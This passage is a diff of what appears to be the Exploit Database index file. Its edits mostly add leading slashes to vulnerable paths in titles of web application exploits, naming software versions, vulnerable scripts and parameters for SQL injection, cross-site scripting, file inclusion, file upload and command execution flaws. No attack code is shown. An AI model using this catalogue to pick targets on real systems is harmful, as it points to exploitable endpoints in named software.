-34904,platforms/php/webapps/34904.txt,"Radvision Scopia - 'entry/index.jsp' Cross-Site Scripting",2009-08-24,"Francesco Bianchino",php,webapps,0 +34904,platforms/php/webapps/34904.txt,"Radvision Scopia - '/entry/index.jsp' Cross-Site Scripting",2009-08-24,"Francesco Bianchino",php,webapps,0 34905,platforms/php/webapps/34905.txt,"W-Agora 4.2.1 - 'search.php3?bn' Traversal Local File Inclusion",2010-10-22,MustLive,php,webapps,0 34906,platforms/php/webapps/34906.txt,"W-Agora 4.2.1 - 'search.php?bn' Cross-Site Scripting",2010-10-22,MustLive,php,webapps,0 34907,platforms/multiple/webapps/34907.txt,"IBM Tivoli Access Manager for E-Business - ivt/ivtserver parm1 Parameter Cross-Site Scripting",2010-10-22,IBM,multiple,webapps,0 @@ -34609,7 +34610,7 @@ id,file,description,date,author,platform,type,port 35008,platforms/cgi/webapps/35008.txt,"Hot Links SQL 3.2 - 'report.cgi' SQL Injection",2010-11-22,"Aliaksandr Hartsuyeu",cgi,webapps,0 35012,platforms/multiple/webapps/35012.txt,"ZYXEL P-660R-T1 V2 - 'HomeCurrent_Date' Cross-Site Scripting",2010-11-23,"Usman Saeed",multiple,webapps,0 35015,platforms/cgi/webapps/35015.txt,"SimpLISTic SQL 2.0 - 'email.cgi' Cross-Site Scripting",2010-11-24,"Aliaksandr Hartsuyeu",cgi,webapps,0 -35016,platforms/php/webapps/35016.txt,"Easy Banner 2009.05.18 - 'member.php' Multiple SQL Injection / Authentication Bypass",2010-11-26,"Aliaksandr Hartsuyeu",php,webapps,0 +35016,platforms/php/webapps/35016.txt,"Easy Banner 2009.05.18 - '/member.php' Multiple SQL Injection / Authentication Bypass",2010-11-26,"Aliaksandr Hartsuyeu",php,webapps,0 35017,platforms/php/webapps/35017.txt,"Easy Banner 2009.05.18 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2010-11-26,"Aliaksandr Hartsuyeu",php,webapps,0 35025,platforms/php/webapps/35025.html,"Car Portal 2.0 - 'car_make' Cross-Site Scripting",2010-11-29,"Underground Stockholm",php,webapps,0 35026,platforms/php/webapps/35026.txt,"Joomla! Component com_storedirectory - 'id' SQL Injection",2010-11-30,XroGuE,php,webapps,0 @@ -34653,7 +34654,7 @@ id,file,description,date,author,platform,type,port 35083,platforms/ios/webapps/35083.txt,"Folder Plus 2.5.1 iOS - Persistent Cross-Site Scripting",2014-10-27,Vulnerability-Lab,ios,webapps,0 35084,platforms/php/webapps/35084.txt,"WordPress Plugin Twitter Feed - 'url' Cross-Site Scripting",2010-12-07,"John Leitch",php,webapps,0 35085,platforms/cgi/webapps/35085.txt,"WWWThread 5.0.8 Pro - 'showflat.pl' Cross-Site Scripting",2010-12-09,"Aliaksandr Hartsuyeu",cgi,webapps,0 -35087,platforms/php/webapps/35087.txt,"net2ftp 0.98 (stable) - 'admin1.template.php' Local/Remote File Inclusion",2010-12-09,"Marcin Ressel",php,webapps,0 +35087,platforms/php/webapps/35087.txt,"net2ftp 0.98 (stable) - '/admin1.template.php' Local/Remote File Inclusion",2010-12-09,"Marcin Ressel",php,webapps,0 35088,platforms/php/webapps/35088.txt,"PHP State - 'id' SQL Injection",2010-12-09,jos_ali_joe,php,webapps,0 35089,platforms/php/webapps/35089.txt,"Joomla! Component Jeformcr - 'id' SQL Injection",2010-12-09,FL0RiX,php,webapps,0 35090,platforms/php/webapps/35090.txt,"Joomla! Component JExtensions Property Finder - 'sf_id' SQL Injection",2010-12-10,FL0RiX,php,webapps,0 @@ -34671,7 +34672,7 @@ id,file,description,date,author,platform,type,port 35106,platforms/php/webapps/35106.txt,"Cetera eCommerce - 'banner.php' Cross-Site Scripting",2010-12-11,MustLive,php,webapps,0 35107,platforms/cfm/webapps/35107.txt,"Mura CMS - Multiple Cross-Site Scripting Vulnerabilities",2010-12-13,"Richard Brain",cfm,webapps,0 35108,platforms/php/webapps/35108.txt,"MyBB 1.4.10 - 'tags.php' Cross-Site Scripting",2010-12-12,TEAMELITE,php,webapps,0 -35109,platforms/php/webapps/35109.txt,"PHP TopSites 2.1 - 'rate.php' Cross-Site Scripting / SQL Injection",2010-12-13,"c0de Hunters",php,webapps,0 +35109,platforms/php/webapps/35109.txt,"PHP TopSites 2.1 - '/rate.php' Cross-Site Scripting / SQL Injection",2010-12-13,"c0de Hunters",php,webapps,0 35110,platforms/php/webapps/35110.txt,"BlogCFC 5.9.6.001 - Multiple Cross-Site Scripting Vulnerabilities",2010-12-14,"Richard Brain",php,webapps,0 35111,platforms/php/webapps/35111.txt,"slickMsg - Cross-Site Scripting / HTML Injection",2010-12-15,"Aliaksandr Hartsuyeu",php,webapps,0 35113,platforms/php/webapps/35113.php,"MAARCH 1.4 - Arbitrary File Upload",2014-10-29,"Adrien Thierry",php,webapps,80 @@ -34755,15 +34756,15 @@ id,file,description,date,author,platform,type,port 35288,platforms/php/webapps/35288.txt,"WordPress Plugin oQey-Gallery 0.2 - 'tbpv_domain' Cross-Site Scripting",2011-01-24,"AutoSec Tools",php,webapps,0 35289,platforms/php/webapps/35289.txt,"WordPress Plugin FCChat Widget 2.1.7 - 'path' Cross-Site Scripting",2011-01-25,"AutoSec Tools",php,webapps,0 35290,platforms/php/webapps/35290.txt,"SimpGB 1.49.2 - 'Guestbook.php' Multiple Cross-Site Scripting Vulnerabilities",2011-01-26,MustLive,php,webapps,0 -35251,platforms/php/webapps/35251.txt,"Pixie CMS 1.0.4 - 'admin/index.php' SQL Injection",2011-01-20,"High-Tech Bridge SA",php,webapps,0 +35251,platforms/php/webapps/35251.txt,"Pixie CMS 1.0.4 - '/admin/index.php' SQL Injection",2011-01-20,"High-Tech Bridge SA",php,webapps,0 35253,platforms/php/webapps/35253.txt,"web@all 1.1 - 'url' Cross-Site Scripting",2011-01-25,"AutoSec Tools",php,webapps,0 35254,platforms/php/webapps/35254.txt,"PivotX 2.2.2 - 'module_image.php' Cross-Site Scripting",2011-01-25,"AutoSec Tools",php,webapps,0 35255,platforms/php/webapps/35255.txt,"WordPress Plugin Uploader 1.0 - 'num' Cross-Site Scripting",2011-01-24,"AutoSec Tools",php,webapps,0 35256,platforms/cfm/webapps/35256.txt,"ActiveWeb Professional 3.0 - Arbitrary File Upload",2011-01-25,StenoPlasma,cfm,webapps,0 35257,platforms/php/webapps/35257.txt,"WordPress Plugin Videox7 UGC 2.5.3.2 - 'listid' Cross-Site Scripting",2011-01-25,"AutoSec Tools",php,webapps,0 35258,platforms/php/webapps/35258.txt,"WordPress Plugin Audio 0.5.1 - 'showfile' Cross-Site Scripting",2011-01-23,"AutoSec Tools",php,webapps,0 -35259,platforms/php/webapps/35259.txt,"PivotX 2.2 - 'pivotx/includes/blogroll.php?color' Cross-Site Scripting",2011-01-25,"High-Tech Bridge SA",php,webapps,0 -35260,platforms/php/webapps/35260.txt,"PivotX 2.2 - 'pivotx/includes/timwrapper.php?src' Cross-Site Scripting",2011-01-25,"High-Tech Bridge SA",php,webapps,0 +35259,platforms/php/webapps/35259.txt,"PivotX 2.2 - '/pivotx/includes/blogroll.php?color' Cross-Site Scripting",2011-01-25,"High-Tech Bridge SA",php,webapps,0 +35260,platforms/php/webapps/35260.txt,"PivotX 2.2 - '/pivotx/includes/timwrapper.php?src' Cross-Site Scripting",2011-01-25,"High-Tech Bridge SA",php,webapps,0 35261,platforms/php/webapps/35261.txt,"WordPress Plugin RSS Feed Reader 0.1 - 'rss_url' Cross-Site Scripting",2011-01-23,"AutoSec Tools",php,webapps,0 35262,platforms/php/webapps/35262.txt,"WordPress Plugin WP Featured Post with Thumbnail 3.0 - 'src' Cross-Site Scripting",2011-01-23,"AutoSec Tools",php,webapps,0 35263,platforms/php/webapps/35263.txt,"WordPress Plugin WP Publication Archive 2.0.1 - 'file' Information Disclosure",2011-01-23,"AutoSec Tools",php,webapps,0 @@ -34854,10 +34855,10 @@ id,file,description,date,author,platform,type,port 35408,platforms/php/webapps/35408.txt,"xtcModified 1.05 - Multiple HTML Injection / Cross-Site Scripting Vulnerabilities",2011-03-03,"High-Tech Bridge SA",php,webapps,0 35409,platforms/php/webapps/35409.txt,"Pragyan CMS 3.0 Beta - Multiple Cross-Site Scripting Vulnerabilities",2011-03-03,"High-Tech Bridge SA",php,webapps,0 35410,platforms/windows/webapps/35410.py,"InterPhoto Image Gallery 2.4.2 - 'IPLANG' Local File Inclusion",2011-03-04,"AutoSec Tools",windows,webapps,0 -35411,platforms/asp/webapps/35411.txt,"Kodak InSite 5.5.2 - 'Troubleshooting/DiagnosticReport.asp?HeaderWarning' Cross-Site Scripting",2011-03-07,Dionach,asp,webapps,0 -35412,platforms/asp/webapps/35412.txt,"Kodak InSite 5.5.2 - 'Pages/login.aspx?Language' Cross-Site Scripting",2011-03-07,Dionach,asp,webapps,0 +35411,platforms/asp/webapps/35411.txt,"Kodak InSite 5.5.2 - '/Troubleshooting/DiagnosticReport.asp?HeaderWarning' Cross-Site Scripting",2011-03-07,Dionach,asp,webapps,0 +35412,platforms/asp/webapps/35412.txt,"Kodak InSite 5.5.2 - '/Pages/login.aspx?Language' Cross-Site Scripting",2011-03-07,Dionach,asp,webapps,0 35416,platforms/php/webapps/35416.txt,"Interleave 5.5.0.2 - 'basicstats.php' Multiple Cross-Site Scripting Vulnerabilities",2011-03-03,"AutoSec Tools",php,webapps,0 -35417,platforms/php/webapps/35417.php,"WS Interactive Automne 4.1 - 'admin/upload-controler.php' Arbitrary File Upload",2011-03-08,"AutoSec Tools",php,webapps,0 +35417,platforms/php/webapps/35417.php,"WS Interactive Automne 4.1 - '/admin/upload-controler.php' Arbitrary File Upload",2011-03-08,"AutoSec Tools",php,webapps,0 35418,platforms/php/webapps/35418.txt,"WordPress Plugin Inline Gallery 0.3.9 - 'do' Cross-Site Scripting",2011-03-08,"High-Tech Bridge SA",php,webapps,0 35419,platforms/hardware/webapps/35419.txt,"Prolink PRN2001 - Multiple Vulnerabilities",2014-12-02,"Herman Groeneveld",hardware,webapps,0 35424,platforms/php/webapps/35424.py,"ProjectSend r-561 - Arbitrary File Upload",2014-12-02,"Fady Mohammed Osman",php,webapps,0 @@ -34969,7 +34970,7 @@ id,file,description,date,author,platform,type,port 35603,platforms/php/webapps/35603.txt,"WordPress Theme Live Wire 2.3.1 - Multiple Vulnerabilities",2011-04-11,MustLive,php,webapps,0 35604,platforms/php/webapps/35604.txt,"eForum 1.1 - 'eforum.php' Arbitrary File Upload",2011-04-09,QSecure,php,webapps,0 35605,platforms/php/webapps/35605.txt,"Lazarus Guestbook 1.22 - Multiple Vulnerabilities",2014-12-24,TaurusOmar,php,webapps,80 -35607,platforms/php/webapps/35607.txt,"WordPress Plugin Spellchecker 3.1 - 'general.php' Local/Remote File Inclusion",2011-04-12,"Dr Trojan",php,webapps,0 +35607,platforms/php/webapps/35607.txt,"WordPress Plugin Spellchecker 3.1 - '/general.php' Local/Remote File Inclusion",2011-04-12,"Dr Trojan",php,webapps,0 35608,platforms/php/webapps/35608.txt,"WordPress Theme The Gazette Edition 2.9.4 - Multiple Vulnerabilities",2011-04-12,MustLive,php,webapps,0 35610,platforms/php/webapps/35610.txt,"Plogger 1.0 RC1 - 'gallery_name' Cross-Site Scripting",2011-04-12,"High-Tech Bridge SA",php,webapps,0 35611,platforms/php/webapps/35611.txt,"Website Baker 2.8.1 - Multiple SQL Injections",2011-04-12,"High-Tech Bridge SA",php,webapps,0 @@ -35059,7 +35060,7 @@ id,file,description,date,author,platform,type,port 35750,platforms/hardware/webapps/35750.pl,"D-Link DSL-2730B Modem - Cross-Site Scripting Injection Stored Exploit DnsProxy.cmd",2015-01-11,"XLabs Security",hardware,webapps,0 35751,platforms/hardware/webapps/35751.pl,"D-Link DSL-2730B Modem - Cross-Site Scripting Injection Stored Exploit Lancfg2get.cgi",2015-01-11,"XLabs Security",hardware,webapps,0 35752,platforms/php/webapps/35752.txt,"Mambo Component Docman 1.3.0 - Multiple SQL Injections",2011-05-16,KedAns-Dz,php,webapps,0 -35754,platforms/php/webapps/35754.txt,"allocPSA 1.7.4 - 'login/login.php' Cross-Site Scripting",2011-05-16,"AutoSec Tools",php,webapps,0 +35754,platforms/php/webapps/35754.txt,"allocPSA 1.7.4 - '/login/login.php' Cross-Site Scripting",2011-05-16,"AutoSec Tools",php,webapps,0 35755,platforms/php/webapps/35755.txt,"DocMGR 1.1.2 - 'history.php' Cross-Site Scripting",2011-05-12,"AutoSec Tools",php,webapps,0 35756,platforms/php/webapps/35756.txt,"openQRM 4.8 - 'source_tab' Cross-Site Scripting",2011-05-16,"AutoSec Tools",php,webapps,0 35757,platforms/php/webapps/35757.txt,"eFront 3.6.9 - 'scripts.php' Local File Inclusion",2011-05-16,"AutoSec Tools",php,webapps,0 @@ -35164,10 +35165,10 @@ id,file,description,date,author,platform,type,port 35940,platforms/php/webapps/35940.txt,"Sphider 1.3.x - Admin Panel Multiple SQL Injections",2011-07-12,"Karthik R",php,webapps,0 35941,platforms/multiple/webapps/35941.txt,"Flowplayer 3.2.7 - 'linkUrl' Cross-Site Scripting",2011-07-12,"Szymon Gruszecki",multiple,webapps,0 35942,platforms/php/webapps/35942.txt,"TCExam 11.2.x - Multiple Cross-Site Scripting Vulnerabilities",2011-07-13,"Gjoko Krstic",php,webapps,0 -35943,platforms/php/webapps/35943.txt,"Chyrp 2.x - 'admin/help.php' Multiple Cross-Site Scripting Vulnerabilities",2011-07-13,Wireghoul,php,webapps,0 -35944,platforms/php/webapps/35944.txt,"Chyrp 2.x - 'includes/JavaScript.php?action' Cross-Site Scripting",2011-07-13,Wireghoul,php,webapps,0 +35943,platforms/php/webapps/35943.txt,"Chyrp 2.x - '/admin/help.php' Multiple Cross-Site Scripting Vulnerabilities",2011-07-13,Wireghoul,php,webapps,0 +35944,platforms/php/webapps/35944.txt,"Chyrp 2.x - '/includes/JavaScript.php?action' Cross-Site Scripting",2011-07-13,Wireghoul,php,webapps,0 35945,platforms/php/webapps/35945.txt,"Chyrp 2.x - URI action Parameter Traversal Local File Inclusion",2011-07-29,Wireghoul,php,webapps,0 -35946,platforms/php/webapps/35946.txt,"Chyrp 2.x - 'includes/lib/gz.php' File Parameter Traversal Arbitrary File Access",2011-07-29,Wireghoul,php,webapps,0 +35946,platforms/php/webapps/35946.txt,"Chyrp 2.x - '/includes/lib/gz.php' File Parameter Traversal Arbitrary File Access",2011-07-29,Wireghoul,php,webapps,0 35947,platforms/php/webapps/35947.txt,"Chyrp 2.x - swfupload Extension upload_handler.php Arbitrary File Upload / Arbitrary PHP Code Execution",2011-07-29,Wireghoul,php,webapps,0 35950,platforms/php/webapps/35950.txt,"NPDS CMS REvolution-13 - SQL Injection",2015-01-24,"Narendra Bhati",php,webapps,80 35954,platforms/php/webapps/35954.txt,"Auto Web Toolbox - 'id' SQL Injection",2011-07-15,Lazmania61,php,webapps,0 @@ -35247,7 +35248,7 @@ id,file,description,date,author,platform,type,port 36079,platforms/php/webapps/36079.txt,"CommodityRentals Real Estate Script - 'txtsearch' HTML Injection",2011-08-24,"Eyup CELIK",php,webapps,0 36080,platforms/php/webapps/36080.txt,"Tourismscripts Hotel Portal - 'hotel_city' HTML Injection",2011-08-24,"Eyup CELIK",php,webapps,0 36081,platforms/php/webapps/36081.txt,"VicBlog - 'tag' SQL Injection",2011-08-24,"Eyup CELIK",php,webapps,0 -36082,platforms/php/webapps/36082.pl,"Zazavi 1.2.1 - 'FileManager/Controller.php' Arbitrary File Upload",2011-08-25,KedAns-Dz,php,webapps,0 +36082,platforms/php/webapps/36082.pl,"Zazavi 1.2.1 - '/FileManager/Controller.php' Arbitrary File Upload",2011-08-25,KedAns-Dz,php,webapps,0 36083,platforms/php/webapps/36083.txt,"Simple Machines Forum (SMF) 1.1.14/2.0 - '[img]' BBCode Tag Cross-Site Request Forgery",2011-08-25,"Christian Yerena",php,webapps,0 36084,platforms/php/webapps/36084.html,"Mambo 4.6.5 - 'index.php' Cross-Site Request Forgery",2011-08-26,Caddy-Dz,php,webapps,0 36085,platforms/php/webapps/36085.txt,"phpWebSite 1.7.1 - 'mod.php' SQL Injection",2011-08-27,Ehsan_Hp200,php,webapps,0 @@ -35339,7 +35340,7 @@ id,file,description,date,author,platform,type,port 36196,platforms/php/webapps/36196.txt,"SonicWALL Viewpoint 6.0 - 'scheduleID' SQL Injection",2011-10-02,Rem0ve,php,webapps,0 36197,platforms/php/webapps/36197.txt,"ezCourses - admin.asp Security Bypass",2011-10-01,J.O,php,webapps,0 36200,platforms/php/webapps/36200.txt,"Netvolution 2.5.8 - 'referer' Header SQL Injection",2011-10-03,"Patroklos Argyroudis",php,webapps,0 -36201,platforms/php/webapps/36201.txt,"Phorum 5.2.18 - 'admin/index.php' Cross-Site Scripting",2011-10-03,"Stefan Schurtz",php,webapps,0 +36201,platforms/php/webapps/36201.txt,"Phorum 5.2.18 - '/admin/index.php' Cross-Site Scripting",2011-10-03,"Stefan Schurtz",php,webapps,0 36202,platforms/hardware/webapps/36202.py,"Seagate Business NAS 2014.00319 - Unauthenticated Remote Code Execution",2015-03-01,"OJ Reeves",hardware,webapps,80 36203,platforms/php/webapps/36203.txt,"vTiger CRM 5.2.1 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2011-10-04,"Aung Khant",php,webapps,0 36204,platforms/php/webapps/36204.txt,"vTiger CRM 5.2.1 - 'PHPrint.php' Multiple Cross-Site Scripting Vulnerabilities",2011-10-04,"Aung Khant",php,webapps,0 @@ -35366,7 +35367,7 @@ id,file,description,date,author,platform,type,port 36233,platforms/php/webapps/36233.txt,"WordPress Plugin Pretty Link 1.4.56 - Multiple Cross-Site Scripting Vulnerabilities",2011-10-13,"High-Tech Bridge SA",php,webapps,0 36236,platforms/php/webapps/36236.txt,"Xenon - 'id' Multiple SQL Injections",2011-10-14,m3rciL3Ss,php,webapps,0 36237,platforms/php/webapps/36237.txt,"asgbookPHP 1.9 - 'index.php' Cross-Site Scripting",2011-10-17,indoushka,php,webapps,0 -36240,platforms/php/webapps/36240.txt,"Site@School 2.4.10 - 'index.php' Cross-Site Scripting / SQL Injection",2011-10-18,"Stefan Schurtz",php,webapps,0 +36240,platforms/php/webapps/36240.txt,"Site@School 2.4.10 - '/index.php' Cross-Site Scripting / SQL Injection",2011-10-18,"Stefan Schurtz",php,webapps,0 36241,platforms/hardware/webapps/36241.txt,"Sagem F@st 3304-V2 - Local File Inclusion",2015-03-03,"Loudiyi Mohamed",hardware,webapps,0 36242,platforms/php/webapps/36242.txt,"WordPress Theme Photocrati 4.x.x - SQL Injection / Cross-Site Scripting",2015-03-03,ayastar,php,webapps,0 36243,platforms/php/webapps/36243.txt,"WordPress Plugin cp-multi-view-calendar 1.1.4 - SQL Injection",2015-03-03,"i0akiN SEC-LABORATORY",php,webapps,0 @@ -35408,8 +35409,8 @@ id,file,description,date,author,platform,type,port 36306,platforms/php/webapps/36306.txt,"PHP Betoffice (Betster) 1.0.4 - Authentication Bypass / SQL Injection",2015-03-06,ZeQ3uL,php,webapps,0 36307,platforms/php/webapps/36307.html,"Search Plugin for Hotaru CMS 1.4.2 - 'admin_index.php?site_name' Cross-Site Scripting",2011-11-13,"Gjoko Krstic",php,webapps,0 36308,platforms/php/webapps/36308.txt,"Webistry 1.6 - 'pid' SQL Injection",2011-11-16,CoBRa_21,php,webapps,0 -36314,platforms/php/webapps/36314.txt,"webERP 4.3.8 - 'reportwriter/ReportMaker.php?reportid' SQL Injection",2011-11-17,"High-Tech Bridge SA",php,webapps,0 -36315,platforms/php/webapps/36315.txt,"webERP 4.3.8 - 'reportwriter/FormMaker.php?ReportID' SQL Injection",2011-11-17,"High-Tech Bridge SA",php,webapps,0 +36314,platforms/php/webapps/36314.txt,"webERP 4.3.8 - '/reportwriter/ReportMaker.php?reportid' SQL Injection",2011-11-17,"High-Tech Bridge SA",php,webapps,0 +36315,platforms/php/webapps/36315.txt,"webERP 4.3.8 - '/reportwriter/FormMaker.php?ReportID' SQL Injection",2011-11-17,"High-Tech Bridge SA",php,webapps,0 36316,platforms/php/webapps/36316.txt,"ZOHO ManageEngine ADSelfService Plus 4.5 Build 4521 - Cross-Site Scripting",2011-11-17,"James webb",php,webapps,0 36317,platforms/php/webapps/36317.txt,"WordPress Plugin Flexible Custom Post Type - 'id' Cross-Site Scripting",2011-11-17,Am!r,php,webapps,0 36320,platforms/php/webapps/36320.txt,"CodoForum 2.5.1 - Arbitrary File Download",2015-03-10,"Kacper Szurek",php,webapps,80 @@ -35430,7 +35431,7 @@ id,file,description,date,author,platform,type,port 36340,platforms/php/webapps/36340.txt,"WordPress Plugin NewsLetter Meenews 5.1 - 'idnews' Cross-Site Scripting",2011-11-23,Amir,php,webapps,0 36341,platforms/php/webapps/36341.txt,"PrestaShop 1.4.4.1 mondialrelay (kit_mondialrelay) - Multiple Cross-Site Scripting Vulnerabilities",2011-11-23,Prestashop,php,webapps,0 40008,platforms/php/webapps/40008.txt,"Getsimple CMS 3.3.10 - Arbitrary File Upload",2016-06-23,s0nk3y,php,webapps,80 -36342,platforms/php/webapps/36342.txt,"PrestaShop 1.4.4.1 - 'modules/mondialrelay/googlemap.php' Multiple Cross-Site Scripting Vulnerabilities",2011-11-23,Prestashop,php,webapps,0 +36342,platforms/php/webapps/36342.txt,"PrestaShop 1.4.4.1 - '/modules/mondialrelay/googlemap.php' Multiple Cross-Site Scripting Vulnerabilities",2011-11-23,Prestashop,php,webapps,0 36343,platforms/php/webapps/36343.txt,"PrestaShop 1.4.4.1 - '/modules/mondialrelay/kit_mondialrelay/SuiviExpedition_ajax.php?Expedition' Cross-Site Scripting",2011-11-23,Prestashop,php,webapps,0 36344,platforms/php/webapps/36344.txt,"PrestaShop 1.4.4.1 - '/admin/ajaxfilemanager/ajax_save_text.php' Multiple Cross-Site Scripting Vulnerabilities",2011-11-23,Prestashop,php,webapps,0 36345,platforms/php/webapps/36345.txt,"Prestashop 1.4.4.1 - 'displayImage.php' HTTP Response Splitting",2011-11-23,RGouveia,php,webapps,0 @@ -35448,8 +35449,8 @@ id,file,description,date,author,platform,type,port 36358,platforms/php/webapps/36358.html,"CS-Cart 4.2.4 - Cross-Site Request Forgery",2015-03-11,"Luis Santana",php,webapps,0 36362,platforms/php/webapps/36362.txt,"eSyndiCat Pro 2.3.5 - Multiple Cross-Site Scripting Vulnerabilities",2011-11-26,d3v1l,php,webapps,0 36363,platforms/php/webapps/36363.txt,"WordPress Plugin Skysa App Bar - 'idnews' Cross-Site Scripting",2011-11-28,Amir,php,webapps,0 -36364,platforms/php/webapps/36364.txt,"Manx 1.0.1 - 'admin/tiny_mce/plugins/ajaxfilemanager/ajax_get_file_listing.php' Multiple Cross-Site Scripting Vulnerabilities",2011-11-28,LiquidWorm,php,webapps,0 -36365,platforms/php/webapps/36365.txt,"Manx 1.0.1 - 'admin/tiny_mce/plugins/ajaxfilemanager_OLD/ajax_get_file_listing.php' Multiple Cross-Site Scripting Vulnerabilities",2011-11-28,LiquidWorm,php,webapps,0 +36364,platforms/php/webapps/36364.txt,"Manx 1.0.1 - '/admin/tiny_mce/plugins/ajaxfilemanager/ajax_get_file_listing.php' Multiple Cross-Site Scripting Vulnerabilities",2011-11-28,LiquidWorm,php,webapps,0 +36365,platforms/php/webapps/36365.txt,"Manx 1.0.1 - '/admin/tiny_mce/plugins/ajaxfilemanager_OLD/ajax_get_file_listing.php' Multiple Cross-Site Scripting Vulnerabilities",2011-11-28,LiquidWorm,php,webapps,0 36366,platforms/php/webapps/36366.txt,"Manx 1.0.1 - '/admin/admin_blocks.php?Filename' Traversal Arbitrary File Access",2011-11-28,LiquidWorm,php,webapps,0 36367,platforms/php/webapps/36367.txt,"Manx 1.0.1 - '/admin/admin_pages.php?Filename' Traversal Arbitrary File Access",2011-11-28,LiquidWorm,php,webapps,0 36368,platforms/php/webapps/36368.txt,"WoltLab Community Gallery - Persistent Cross-Site Scripting",2015-03-13,"ITAS Team",php,webapps,0 @@ -35461,7 +35462,7 @@ id,file,description,date,author,platform,type,port 36375,platforms/asp/webapps/36375.txt,"Virtual Vertex Muster 6.1.6 - Web Interface Directory Traversal",2011-11-29,"Nick Freeman",asp,webapps,0 36379,platforms/php/webapps/36379.txt,"OrangeHRM 2.6.11 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2011-11-30,"High-Tech Bridge SA",php,webapps,0 36380,platforms/php/webapps/36380.txt,"OrangeHRM 2.6.11 - lib/controllers/CentralController.php URI Cross-Site Scripting",2011-11-30,"High-Tech Bridge SA",php,webapps,0 -36381,platforms/php/webapps/36381.txt,"OrangeHRM 2.6.11 - 'lib/controllers/CentralController.php?id' SQL Injection",2011-11-30,"High-Tech Bridge SA",php,webapps,0 +36381,platforms/php/webapps/36381.txt,"OrangeHRM 2.6.11 - '/lib/controllers/CentralController.php?id' SQL Injection",2011-11-30,"High-Tech Bridge SA",php,webapps,0 36382,platforms/php/webapps/36382.txt,"WordPress Plugin 1-jquery-photo-gallery-Slideshow-flash 1.01 - Cross-Site Scripting",2011-11-30,Am!r,php,webapps,0 36383,platforms/php/webapps/36383.txt,"WordPress Plugin flash-album-gallery - 'facebook.php' Cross-Site Scripting",2011-11-30,Am!r,php,webapps,0 36384,platforms/php/webapps/36384.txt,"SugarCRM Community Edition 6.3.0RC1 - 'index.php' Multiple SQL Injections",2011-11-30,"High-Tech Bridge SA",php,webapps,0 @@ -35633,15 +35634,15 @@ id,file,description,date,author,platform,type,port 36640,platforms/php/webapps/36640.txt,"WordPress Plugin Work The Flow File Upload 2.5.2 - Arbitrary File Upload",2015-04-05,"Claudio Viviani",php,webapps,0 36641,platforms/php/webapps/36641.txt,"u-Auctions - Multiple Vulnerabilities",2015-04-05,*Don*,php,webapps,0 36642,platforms/php/webapps/36642.txt,"Joomla! Component com_bbs - Multiple SQL Injections",2012-01-30,the_cyber_nuxbie,php,webapps,0 -36643,platforms/php/webapps/36643.txt,"4Images 1.7.10 - 'admin/categories.php?cat_parent_id' SQL Injection",2012-01-31,RandomStorm,php,webapps,0 -36644,platforms/php/webapps/36644.txt,"4Images 1.7.10 - 'admin/categories.php?cat_parent_id' Cross-Site Scripting",2012-01-31,RandomStorm,php,webapps,0 -36645,platforms/php/webapps/36645.txt,"4Images 1.7.10 - 'admin/index.php?redirect' Arbitrary Site Redirect",2012-01-31,RandomStorm,php,webapps,0 +36643,platforms/php/webapps/36643.txt,"4Images 1.7.10 - '/admin/categories.php?cat_parent_id' SQL Injection",2012-01-31,RandomStorm,php,webapps,0 +36644,platforms/php/webapps/36644.txt,"4Images 1.7.10 - '/admin/categories.php?cat_parent_id' Cross-Site Scripting",2012-01-31,RandomStorm,php,webapps,0 +36645,platforms/php/webapps/36645.txt,"4Images 1.7.10 - '/admin/index.php?redirect' Arbitrary Site Redirect",2012-01-31,RandomStorm,php,webapps,0 36646,platforms/php/webapps/36646.txt,"Joomla! Component com_cmotour - 'id' SQL Injection",2012-01-28,the_cyber_nuxbie,php,webapps,0 36647,platforms/php/webapps/36647.txt,"Lead Capture - 'login.php' Script Cross-Site Scripting",2012-01-21,HashoR,php,webapps,0 -36648,platforms/php/webapps/36648.txt,"OpenEMR 4.1 - 'Interface/patient_file/encounter/trend_form.php?formname' Traversal Local File Inclusion",2012-02-01,"High-Tech Bridge SA",php,webapps,0 -36649,platforms/php/webapps/36649.txt,"OpenEMR 4.1 - 'Interface/patient_file/encounter/load_form.php?formname' Traversal Local File Inclusion",2012-02-01,"High-Tech Bridge SA",php,webapps,0 -36650,platforms/php/webapps/36650.txt,"OpenEMR 4.1 - 'contrib/acog/print_form.php?formname' Traversal Local File Inclusion",2012-02-01,"High-Tech Bridge SA",php,webapps,0 -36651,platforms/php/webapps/36651.txt,"OpenEMR 4.1 - 'Interface/fax/fax_dispatch.php' File Parameter 'exec()' Call Arbitrary Shell Command Execution",2012-02-01,"High-Tech Bridge SA",php,webapps,0 +36648,platforms/php/webapps/36648.txt,"OpenEMR 4.1 - '/Interface/patient_file/encounter/trend_form.php?formname' Traversal Local File Inclusion",2012-02-01,"High-Tech Bridge SA",php,webapps,0 +36649,platforms/php/webapps/36649.txt,"OpenEMR 4.1 - '/Interface/patient_file/encounter/load_form.php?formname' Traversal Local File Inclusion",2012-02-01,"High-Tech Bridge SA",php,webapps,0 +36650,platforms/php/webapps/36650.txt,"OpenEMR 4.1 - '/contrib/acog/print_form.php?formname' Traversal Local File Inclusion",2012-02-01,"High-Tech Bridge SA",php,webapps,0 +36651,platforms/php/webapps/36651.txt,"OpenEMR 4.1 - '/Interface/fax/fax_dispatch.php' File Parameter 'exec()' Call Arbitrary Shell Command Execution",2012-02-01,"High-Tech Bridge SA",php,webapps,0 36654,platforms/php/webapps/36654.txt,"phpLDAPadmin 1.2.2 - 'base' Cross-Site Scripting",2012-02-01,andsarmiento,php,webapps,0 36655,platforms/php/webapps/36655.txt,"phpLDAPadmin 1.2.0.5-2 - 'server_id' Cross-Site Scripting",2012-02-01,andsarmiento,php,webapps,0 36656,platforms/php/webapps/36656.txt,"GForge 5.7.1 - Multiple Cross-Site Scripting Vulnerabilities",2012-02-02,sonyy,php,webapps,0 @@ -35661,21 +35662,21 @@ id,file,description,date,author,platform,type,port 36676,platforms/php/webapps/36676.html,"Balero CMS 0.7.2 - Multiple JS/HTML Injection Vulnerabilities",2015-04-08,LiquidWorm,php,webapps,80 36677,platforms/php/webapps/36677.txt,"WordPress Plugin Traffic Analyzer 3.4.2 - Blind SQL Injection",2015-04-08,"Dan King",php,webapps,80 36678,platforms/jsp/webapps/36678.txt,"ZENworks Configuration Management 11.3.1 - Remote Code Execution",2015-04-08,"Pedro Ribeiro",jsp,webapps,0 -36683,platforms/php/webapps/36683.txt,"Dolibarr CMS 3.x - 'adherents/fiche.php' SQL Injection",2012-02-10,"Benjamin 